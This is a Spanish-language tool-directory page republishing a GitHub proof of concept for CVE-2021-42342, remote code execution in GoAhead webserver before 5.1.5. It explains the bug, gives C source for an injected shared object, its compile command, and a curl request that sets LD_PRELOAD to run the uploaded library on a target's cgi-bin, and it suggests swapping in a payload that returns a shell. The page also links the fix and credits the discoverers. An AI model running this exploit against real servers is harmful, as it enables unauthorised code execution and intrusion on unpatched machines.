Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
goahead-webserver-pre-5.1.5-RCE-PoC-CVE-2021-42342- — Un pequeño PoC para el reciente RCE encontrado en el Goahead Webserver anterior a la versión 5.1.5. | Kitploit
Herramientas/GitHubGitHub/kimusan/goahead-webserver-pre-5.1.5-rce-poc-cve-2021-42342-
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubkimusan/goahead-webserver-pre-5.1.5-rce-poc-cve-2021-42342-

goahead-webserver-pre-5.1.5-RCE-PoC-CVE-2021-42342-

Un pequeño PoC para el reciente RCE encontrado en el Goahead Webserver anterior a la versión 5.1.5.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
234hace 4 añosRevisado por Kitploit

Goahead webserver (pre v5.1.5) PoC de RCE (CVE-2021-42342)

Un error reciente en Goahead Webserver fue descubierto por William Bowling que conduce a RCE en el servidor explotado.

El problema existe en versiones anteriores a la 5.1.5 que, según Shodan, cubren alrededor de 2.8 millones de servidores en internet.
Ahora hay un CVE disponible [https://nvd.nist.gov/vuln/detail/CVE-2021-42342]

El RCE se debe al hecho de que si el filtro de subida de archivos está habilitado, el usuario puede subir archivos y, al mismo tiempo, establecer variables de formulario de usuario.

Estas variables terminan siendo variables de entorno del sistema operativo. Normalmente esto no es un problema, ya que en los casos normales de subida de formularios, las variables de entorno se prefijan con CGI_ (por defecto). Sin embargo, si el filtro de subida de archivos está habilitado, un error en el código hace que este prefijo se omita = RCE instantáneo mediante variables de entorno + archivo.

Creando un objeto compartido simple

Lo siguiente simplemente imprime "Hello World" en el servidor remoto, pero podría ser cualquier cosa en realidad:

root@kitploit:~
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
static void before_main(void) __attribute__((constructor));

static void before_main(void)
{
    write(1, "Hello World!\n", 14);
}

Compilar con:

root@kitploit:~
gcc -fPIC -shared -o poc.so poc.c -nostartfiles

Explotando el servidor

ahora estamos listos para enviar nuestro archivo al servidor. Esto se puede hacer con curl:

root@kitploit:~
curl -X POST  http://[TARGET]/cgi-bin/ -F "LD_PRELOAD=/proc/self/fd/0" -F file='@poc.so;encoder=base64'

cambia [TARGET] por el dominio/ip del servidor objetivo.

Probablemente verás un error del servidor, pero prueba con otro objeto compartido que, por ejemplo, te devuelva una buena shell 👍

Solución

Ya hay una solución con goahead 5.1.5 aquí: [https://github.com/embedthis/goahead/issues/305]

Créditos

El problema fue encontrado inicialmente por Willian Bowling del equipo Perfect Blue CTF. Durante el pbCTF 2021, un desafío era la versión existente del servidor goahead en ese momento (5.1.4), y junto con el Kalmarunionen CTF Team nos topamos con el mismo problema 0day en el código (aún sin revelar a los autores).

Descargar herramienta